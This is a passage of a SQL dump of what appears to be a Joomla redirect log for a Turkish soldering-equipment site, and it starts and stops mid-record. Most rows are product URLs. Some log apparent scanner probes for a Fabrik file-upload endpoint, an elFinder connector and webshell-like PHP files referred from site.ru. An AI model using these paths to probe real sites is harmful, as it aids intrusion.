00:00:00',301),(16081,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/lehimleme-malzemeleri/ã§ubuk-lehim',NULL,'','',6,0,'2017-12-12 10:13:45','0000-00-00 00:00:00',301),(16082,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,`p`.product_sku/results,1-5',NULL,'','',4,0,'2017-12-12 10:23:37','0000-00-00 00:00:00',301),(16083,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,category_name/dirdesc',NULL,'','',3,0,'2017-12-12 10:58:10','0000-00-00 00:00:00',301),(16084,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,mf_name/results,1-50',NULL,'','',8,0,'2017-12-12 11:35:25','0000-00-00 00:00:00',301),(16085,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&itemid=130&lang=tr',NULL,'','',5,0,'2017-12-12 11:53:01','0000-00-00 00:00:00',301),(16086,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',217,0,'2017-12-12 12:01:06','0000-00-00 00:00:00',301),(16087,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name?language=en-gb',NULL,'','',22,0,'2017-12-12 12:18:04','0000-00-00 00:00:00',301),(16088,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,product_sku/results,1-5',NULL,'','',3,0,'2017-12-12 12:25:05','0000-00-00 00:00:00',301),(16089,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/flux',NULL,'','',12,0,'2017-12-12 13:10:59','0000-00-00 00:00:00',301),(16090,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,product_sku/results,1-20',NULL,'','',1,0,'2017-12-12 13:39:33','0000-00-00 00:00:00',301),(16091,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,category_name',NULL,'','',1,0,'2017-12-12 14:04:22','0000-00-00 00:00:00',301),(16092,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,product_sku/results,1-50',NULL,'','',1,0,'2017-12-12 15:18:51','0000-00-00 00:00:00',301),(16093,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,`p`.product_sku',NULL,'','',1,0,'2017-12-12 15:31:16','0000-00-00 00:00:00',301),(16094,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2017-12-12 16:08:32','0000-00-00 00:00:00',301),(16095,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2017-12-12 16:20:55','0000-00-00 00:00:00',301),(16096,'http://www.3s-technologies.com.tr/index.php/en/products/çubuk-lehim/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-12 16:28:14','0000-00-00 00:00:00',301),(16097,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,mf_name/dirdesc/results,1-10',NULL,'','',4,0,'2017-12-12 17:47:49','0000-00-00 00:00:00',301),(16098,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,mf_name/results,1-10',NULL,'','',5,0,'2017-12-12 18:00:13','0000-00-00 00:00:00',301),(16099,'http://3s-technologies.com.tr/index.php/tr/ueruenler/thru-hole/by,product_sku?language=tr-tr',NULL,'','',7,0,'2017-12-12 18:15:55','0000-00-00 00:00:00',301),(16100,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,category_name/dirdesc',NULL,'','',1,0,'2017-12-12 18:37:28','0000-00-00 00:00:00',301),(16101,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturers/mirae',NULL,'','',22,0,'2017-12-12 18:47:08','0000-00-00 00:00:00',301),(16102,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,mf_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-12-12 19:00:10','0000-00-00 00:00:00',301),(16103,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-12 19:04:41','0000-00-00 00:00:00',301),(16104,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,product_sku/results,1-10',NULL,'','',4,0,'2017-12-12 19:51:35','0000-00-00 00:00:00',301),(16105,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,mf_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-12 20:01:52','0000-00-00 00:00:00',301),(16106,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-10?language=en-gb',NULL,'','',1,0,'2017-12-12 20:32:44','0000-00-00 00:00:00',301),(16107,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,product_name/results,1-10',NULL,'','',1,0,'2017-12-12 21:13:53','0000-00-00 00:00:00',301),(16108,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/results,1-5?language=en-gb',NULL,'','',4,0,'2017-12-12 22:15:35','0000-00-00 00:00:00',301),(16109,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,category_name/results,1-20',NULL,'','',4,0,'2017-12-12 22:25:52','0000-00-00 00:00:00',301),(16110,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=section&id=6&itemid=1&lang=tr',NULL,'','',2,0,'2017-12-12 22:32:00','0000-00-00 00:00:00',301),(16111,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,category_name/results,1-5',NULL,'','',1,0,'2017-12-12 22:36:09','0000-00-00 00:00:00',301),(16112,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/by,category_name?language=en-gb',NULL,'','',25,0,'2017-12-12 22:42:24','0000-00-00 00:00:00',301),(16113,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-12 22:47:31','0000-00-00 00:00:00',301),(16114,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&itemid=27&lang=tr',NULL,'','',2,0,'2017-12-12 22:55:59','0000-00-00 00:00:00',301),(16115,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/results,1-10?language=en-gb',NULL,'','',4,0,'2017-12-12 23:27:36','0000-00-00 00:00:00',301),(16116,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,category_name/results,1-50',NULL,'','',1,0,'2017-12-12 23:58:26','0000-00-00 00:00:00',301),(16117,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54&itemid=114&lang=tr',NULL,'','',3,0,'2017-12-12 23:59:53','0000-00-00 00:00:00',301),(16118,'http://www.3s-technologies.com.tr/en/products/konveyorler/by,category_name/dirdesc',NULL,'','',1,0,'2017-12-13 00:03:58','0000-00-00 00:00:00',301),(16119,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,category_name/results,1-50',NULL,'','',3,0,'2017-12-13 00:08:43','0000-00-00 00:00:00',301),(16120,'http://www.3s-technologies.com.tr/en/products/gf-12-hc-ht-detail?tmpl=component&print=1',NULL,'','',37,0,'2017-12-13 00:12:46','0000-00-00 00:00:00',301),(16121,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/by,mf_name/results,1-10',NULL,'','',12,0,'2017-12-13 00:19:00','0000-00-00 00:00:00',301),(16122,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,category_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-13 00:29:19','0000-00-00 00:00:00',301),(16123,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/results,1-5?language=en-gb',NULL,'','',1,0,'2017-12-13 01:00:09','0000-00-00 00:00:00',301),(16124,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,mf_name/results,1-50',NULL,'','',4,0,'2017-12-13 01:10:26','0000-00-00 00:00:00',301),(16125,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,product_sku?language=tr-tr',NULL,'','',31,0,'2017-12-13 01:10:55','0000-00-00 00:00:00',301),(16126,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,category_name/results,1-10',NULL,'','',3,0,'2017-12-13 01:20:43','0000-00-00 00:00:00',301),(16127,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-orta-hızlı/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-13 01:31:32','0000-00-00 00:00:00',301),(16128,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-13 01:41:40','0000-00-00 00:00:00',301),(16129,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/results,1-50?language=en-gb',NULL,'','',1,0,'2017-12-13 02:01:51','0000-00-00 00:00:00',301),(16130,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,mf_name/dirdesc/results,1-5',NULL,'','',4,0,'2017-12-13 02:43:00','0000-00-00 00:00:00',301),(16131,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,category_name/dirdesc/results,1-10',NULL,'','',6,0,'2017-12-13 04:01:51','0000-00-00 00:00:00',301),(16132,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&itemid=110&lang=tr',NULL,'','',2,0,'2017-12-13 05:33:08','0000-00-00 00:00:00',301),(16133,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-5?language=en-gb',NULL,'','',1,0,'2017-12-13 05:44:43','0000-00-00 00:00:00',301),(16134,'http://www.3s-technologies.com.tr/index.php/en/products/krem-lehim/krem-lehim-31-32-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-13 06:04:43','0000-00-00 00:00:00',301),(16135,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&itemid=164&lang=tr',NULL,'','',2,0,'2017-12-13 06:18:15','0000-00-00 00:00:00',301),(16136,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name/dirdesc',NULL,'','',1,0,'2017-12-13 06:44:42','0000-00-00 00:00:00',301),(16137,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-34-detail/askquestion?tmpl=component',NULL,'','',22,0,'2017-12-13 06:56:05','0000-00-00 00:00:00',301),(16138,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-20?language=en-gb',NULL,'','',1,0,'2017-12-13 07:44:42','0000-00-00 00:00:00',301),(16139,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_name/results,1-5',NULL,'','',1,0,'2017-12-13 08:27:33','0000-00-00 00:00:00',301),(16140,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_name/results,1-5',NULL,'','',4,0,'2017-12-13 08:44:42','0000-00-00 00:00:00',301),(16141,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-10?language=en-gb',NULL,'','',1,0,'2017-12-13 09:10:24','0000-00-00 00:00:00',301),(16142,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_name/results,1-20',NULL,'','',5,0,'2017-12-13 09:53:16','0000-00-00 00:00:00',301),(16143,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=section&id=6&itemid=1&lang=en',NULL,'','',3,0,'2017-12-13 10:04:17','0000-00-00 00:00:00',301),(16144,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name/results,1-40',NULL,'','',2,0,'2017-12-13 11:10:24','0000-00-00 00:00:00',301),(16145,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,ordering/results,1-50?language=en-gb',NULL,'','',3,0,'2017-12-13 11:27:33','0000-00-00 00:00:00',301),(16146,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=127&itemid=134&lang=tr',NULL,'','',19,0,'2017-12-13 11:54:14','0000-00-00 00:00:00',301),(16147,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_sku/results,1-20',NULL,'','',7,0,'2017-12-13 12:08:45','0000-00-00 00:00:00',301),(16148,'http://3s-technologies.com.tr//index.php?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',7,0,'2017-12-13 12:20:37','0000-00-00 00:00:00',301),(16149,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name/results,1-20',NULL,'','',4,0,'2017-12-13 13:24:28','0000-00-00 00:00:00',301),(16150,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&itemid=2&lang=tr',NULL,'','',1,0,'2017-12-13 14:12:43','0000-00-00 00:00:00',301),(16151,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_name/results,1-20',NULL,'','',1,0,'2017-12-13 14:32:22','0000-00-00 00:00:00',301),(16152,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-13 15:51:15','0000-00-00 00:00:00',301),(16153,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-20?language=en-gb',NULL,'','',1,0,'2017-12-13 16:10:33','0000-00-00 00:00:00',301),(16154,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-10?language=en-gb',NULL,'','',1,0,'2017-12-13 17:35:38','0000-00-00 00:00:00',301),(16155,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc/results,1-20',NULL,'','',6,0,'2017-12-13 18:01:49','0000-00-00 00:00:00',301),(16156,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2017-12-13 18:28:00','0000-00-00 00:00:00',301),(16157,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name/results,1-100',NULL,'','',1,0,'2017-12-13 18:34:32','0000-00-00 00:00:00',301),(16158,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2017-12-13 18:41:05','0000-00-00 00:00:00',301),(16159,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/dirdesc/results,1-10?language=en-gb',NULL,'','',1,0,'2017-12-13 19:53:06','0000-00-00 00:00:00',301),(16160,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name/dirdesc/results,1-40',NULL,'','',1,0,'2017-12-13 20:32:21','0000-00-00 00:00:00',301),(16161,'http://3s-technologies.com.tr/tr/?option=com_fabrik&format=raw&task=plugin.pluginajax&plugin=fileupload&method=ajax_upload',NULL,'','',41,0,'2017-12-13 21:05:50','0000-00-00 00:00:00',301),(16162,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,category_name/results,1-5',NULL,'','',1,0,'2017-12-13 21:24:14','0000-00-00 00:00:00',301),(16163,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_name/results,1-50',NULL,'','',3,0,'2017-12-13 21:49:57','0000-00-00 00:00:00',301),(16164,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-13 23:00:40','0000-00-00 00:00:00',301),(16165,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/dirdesc/results,1-20?language=en-gb',NULL,'','',4,0,'2017-12-14 00:04:57','0000-00-00 00:00:00',301),(16166,'http://3s-technologies.com.tr/index.php/tr/ueruenler/rh6-detail?tmpl=component&print=1',NULL,'','',7,0,'2017-12-14 00:30:55','0000-00-00 00:00:00',301),(16167,'http://www.3s-technologies.com.tr/tr/github.com/joomla',NULL,'','',165,0,'2017-12-14 00:43:04','0000-00-00 00:00:00',301),(16168,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,category_name/results,1-20',NULL,'','',5,0,'2017-12-14 00:59:51','0000-00-00 00:00:00',301),(16169,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2017-12-14 01:15:40','0000-00-00 00:00:00',301),(16170,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/dirdesc/results,1-10?language=en-gb',NULL,'','',3,0,'2017-12-14 01:34:58','0000-00-00 00:00:00',301),(16171,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/dirdesc/results,1-50?language=en-gb',NULL,'','',6,0,'2017-12-14 02:26:22','0000-00-00 00:00:00',301),(16172,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_sku/results,1-10',NULL,'','',5,0,'2017-12-14 02:51:22','0000-00-00 00:00:00',301),(16173,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-14 03:24:13','0000-00-00 00:00:00',301),(16174,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,pc.ordering,product_name/dirdesc/results,1-20?language=en-gb',NULL,'','',1,0,'2017-12-14 03:30:39','0000-00-00 00:00:00',301),(16175,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fä±rä±n/by,category_name',NULL,'','',1,0,'2017-12-14 03:55:03','0000-00-00 00:00:00',301),(16176,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_sku/results,1-20?language=en-gb',NULL,'','',1,0,'2017-12-14 04:41:22','0000-00-00 00:00:00',301),(16177,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2017-12-14 05:32:48','0000-00-00 00:00:00',301),(16178,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,`p`.product_sku/results,1-50',NULL,'','',1,0,'2017-12-14 05:39:13','0000-00-00 00:00:00',301),(16179,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,category_name/dirdesc/results,1-40',NULL,'','',3,0,'2017-12-14 05:52:04','0000-00-00 00:00:00',301),(16180,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,product_sku/results,1-10?language=en-gb&filter_product=',NULL,'','',4,0,'2017-12-14 07:01:18','0000-00-00 00:00:00',301),(16181,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,pc.ordering,product_name/results,1-5',NULL,'','',5,0,'2017-12-14 07:08:13','0000-00-00 00:00:00',301),(16182,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-14 07:35:55','0000-00-00 00:00:00',301),(16183,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,product_name/dirdesc',NULL,'','',14,0,'2017-12-14 08:58:59','0000-00-00 00:00:00',301),(16184,'http://www.3s-technologies.com.tr/tr/urunler/smd-orta-hızlı/dirdesc/results,1-50',NULL,'','',5,0,'2017-12-14 09:05:55','0000-00-00 00:00:00',301),(16185,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/results,1-5?language=en-gb&filter_product=',NULL,'','',1,0,'2017-12-14 09:12:50','0000-00-00 00:00:00',301),(16186,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',3,0,'2017-12-14 09:40:31','0000-00-00 00:00:00',301),(16187,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,pc.ordering,product_name/results,1-20',NULL,'','',1,0,'2017-12-14 09:47:27','0000-00-00 00:00:00',301),(16188,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/dirdesc/results,1-10',NULL,'','',4,0,'2017-12-14 10:15:09','0000-00-00 00:00:00',301),(16189,'http://www.3s-technologies.com.tr/en/wp-content/plugins/custom-background/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/custom-background/readme.txt','',1,0,'2017-12-14 10:31:35','0000-00-00 00:00:00',301),(16190,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc/results,1-10?language=en-gb&filter_product=',NULL,'','',4,0,'2017-12-14 10:35:54','0000-00-00 00:00:00',301),(16191,'http://www.3s-technologies.com.tr/en/wp-content/themes/konzept/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/konzept/style.css','',7,0,'2017-12-14 10:38:38','0000-00-00 00:00:00',301),(16192,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2017-12-14 11:31:17','0000-00-00 00:00:00',301),(16193,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc/results,1-40',NULL,'','',1,0,'2017-12-14 11:38:12','0000-00-00 00:00:00',301),(16194,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/results,1-5?language=en-gb',NULL,'','',2,0,'2017-12-14 11:52:04','0000-00-00 00:00:00',301),(16195,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-14 12:39:46','0000-00-00 00:00:00',301),(16196,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,pc.ordering,product_name/results,1-10',NULL,'','',1,0,'2017-12-14 12:40:31','0000-00-00 00:00:00',301),(16197,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_name/results,1-50',NULL,'','',1,0,'2017-12-14 12:47:26','0000-00-00 00:00:00',301),(16198,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,`p`.product_sku/dirdesc/results,1-100',NULL,'','',3,0,'2017-12-14 14:03:35','0000-00-00 00:00:00',301),(16199,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,mf_name/dirdesc/results,1-5',NULL,'','',1,0,'2017-12-14 14:10:30','0000-00-00 00:00:00',301),(16200,'http://3s-technologies.com.tr/tr/administrator/header_img.php',NULL,'http://site.ru','',4,0,'2017-12-14 14:23:26','0000-00-00 00:00:00',301),(16201,'http://3s-technologies.com.tr/tr/administrator/header_img.php',NULL,'http://site.ru','',1,0,'2017-12-14 14:23:26','0000-00-00 00:00:00',301),(16202,'http://www.3s-technologies.com.tr/index.php/en/products/smd-düşük-hızlı/by,category_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-14 14:36:27','0000-00-00 00:00:00',301),(16203,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,`p`.product_sku/results,1-5?language=en-gb',NULL,'','',1,0,'2017-12-14 14:38:12','0000-00-00 00:00:00',301),(16204,'http://3s-technologies.com.tr/tr/log/logo_img.php',NULL,'http://site.ru','',4,0,'2017-12-14 14:38:53','0000-00-00 00:00:00',301),(16205,'http://3s-technologies.com.tr/tr/administrator/includes/use.php',NULL,'http://site.ru','',3,0,'2017-12-14 14:39:00','0000-00-00 00:00:00',301),(16206,'http://3s-technologies.com.tr/tr/libraries/joomla/template/bookmark.php',NULL,'http://site.ru','',4,0,'2017-12-14 14:48:34','0000-00-00 00:00:00',301),(16207,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder/connectors/php/connector.php',NULL,'http://3s-technologies.com.tr/tr/sites/all/libraries/elfinder/connectors/php/connector.php','',28,0,'2017-12-14 14:54:30','0000-00-00 00:00:00',301),(16208,'http://3s-technologies.com.tr/tr/cache/logo_img.php',NULL,'http://site.ru','',7,0,'2017-12-14 15:13:51','0000-00-00 00:00:00',301),(16209,'http://3s-technologies.com.tr/tr/administrator/system_info.php',NULL,'http://site.ru','',4,0,'2017-12-14 15:50:24','0000-00-00 00:00:00',301),(16210,'http://3s-technologies.com.tr/tr/layouts/system_infos.php',NULL,'http://site.ru','',4,0,'2017-12-14 15:59:36','0000-00-00 00:00:00',301),(16211,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/dirdesc',NULL,'','',2,0,'2017-12-14 16:01:16','0000-00-00 00:00:00',301),(16212,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,mf_name/dirdesc/results,1-20',NULL,'','',2,0,'2017-12-14 16:08:12','0000-00-00 00:00:00',301),(16213,'http://3s-technologies.com.tr/tr/ekomi/popup-pomo.php',NULL,'http://site.ru','',4,0,'2017-12-14 16:23:31','0000-00-00 00:00:00',301),(16214,'http://3s-technologies.com.tr/tr/maints/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-12-14 16:23:50','0000-00-00 00:00:00',301),(16215,'http://3s-technologies.com.tr/tr/modules/logo_img.php',NULL,'http://site.ru','',11,0,'2017-12-14 16:24:39','0000-00-00 00:00:00',301),(16216,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/by,mf_name/results,1-5',NULL,'','',1,0,'2017-12-14 17:04:44','0000-00-00 00:00:00',301),(16217,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,mf_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-14 17:42:14','0000-00-00 00:00:00',301),(16218,'http://3s-technologies.com.tr/en/sites/all/libraries/elfinder/connectors/php/connector.php',NULL,'http://3s-technologies.com.tr/sites/all/libraries/elfinder/connectors/php/connector.php','',2,0,'2017-12-14 17:44:53','0000-00-00 00:00:00',301),(16219,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,ordering/results,1-20',NULL,'','',1,0,'2017-12-14 17:49:59','0000-00-00 00:00:00',301),(16220,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,`p`.product_sku/results,1-10?language=en-gb',NULL,'','',1,0,'2017-12-14 18:27:14','0000-00-00 00:00:00',301),(16221,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-14 18:31:36','0000-00-00 00:00:00',301),(16222,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_name/dirdesc/results,1-5',NULL,'','',4,0,'2017-12-14 18:34:44','0000-00-00 00:00:00',301),(16223,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-14 18:42:18','0000-00-00 00:00:00',301),(16224,'http://3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/tr/component/virtuemart/led-paneller/led-panel-sıvaustu?itemid=124',NULL,'','',2,0,'2017-12-14 18:45:49','0000-00-00 00:00:00',301),(16225,'http://www.3s-technologies.com.tr/en/contacts?format=feed&type=atom',NULL,'','',12,0,'2017-12-14 19:35:03','0000-00-00 00:00:00',301),(16226,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,`p`.product_sku/results,1-20?language=en-gb',NULL,'','',3,0,'2017-12-14 20:12:14','0000-00-00 00:00:00',301),(16227,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-12-14 20:19:43','0000-00-00 